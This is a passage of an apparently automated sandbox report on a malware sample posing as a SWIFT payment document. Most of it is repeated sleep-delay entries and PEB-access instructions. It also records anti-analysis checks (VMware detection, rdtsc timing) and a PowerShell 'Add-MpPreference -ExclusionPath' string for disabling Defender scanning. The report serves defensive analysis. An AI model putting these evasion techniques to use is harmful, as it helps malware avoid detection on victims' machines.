          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237390
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237281
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237171
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237062
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236952
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236843
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236734
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236625
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236515
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236406
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236296
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236152
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236046
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235937
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235828
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235718
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235609
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235500
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235390
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235281
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235141
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235031
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234913
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234797
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234682
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234553
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234391
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234250
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234140
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234012
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233898
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233750
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233640
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233529
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233421
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233312
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233203
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233093
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232980
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232865
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232687
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232535
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232395
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232268
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 230891
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 230122
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeWindow / User API: threadDelayed 3989
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeWindow / User API: threadDelayed 4346
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6427
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1224
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7185
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1300
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239828
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 39327
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239718
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239609
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239497
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239370
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239263
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239152
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 239031
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238921
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238812
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238703
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238593
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238483
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238375
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238265
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238150
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 238045
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237937
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237828
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237718
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237609
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237499
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237390
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237281
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237171
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 237062
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236952
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236843
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236734
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236625
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236515
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236406
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236296
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236152
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 236046
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235937
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235828
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235718
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235609
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235500
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235390
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235281
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235141
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 235031
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234913
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234797
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234682
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234553
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234391
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234250
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234140
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 234012
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233898
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233750
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233640
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233529
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233421
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233312
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233203
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 233093
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232980
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232865
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232687
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232535
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232395
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 232268
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 230891
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeThread delayed: delay time: 230122
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 0000000B.00000000.308028352.000000000891C000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 0000000B.00000000.302474555.000000000375F000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 0000000B.00000000.266676869.00000000011B3000.00000004.00000020.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
          Source: explorer.exe, 0000000B.00000000.274705070.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
          Source: explorer.exe, 0000000B.00000000.330209660.00000000053C4000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
          Source: explorer.exe, 0000000B.00000000.274705070.00000000089B5000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
          Source: TT_SWIFT_Export Order_noref S10SMG00318021.exe, 00000000.00000002.263661342.0000000002DE1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_004088E0 rdtsc
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\help.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01403D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01443540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013D3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013E7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0144A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01498D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013F35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_014541E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01478DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013C2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013EC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013CB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013FBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0145C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_013DB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01482073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01491074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0149740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0149740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_0149740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\TT_SWIFT_Export Order_noref S10SMG00318021.exeCode function: 8_2_01481C06 mov eax, dword ptr fs:[00000030h]
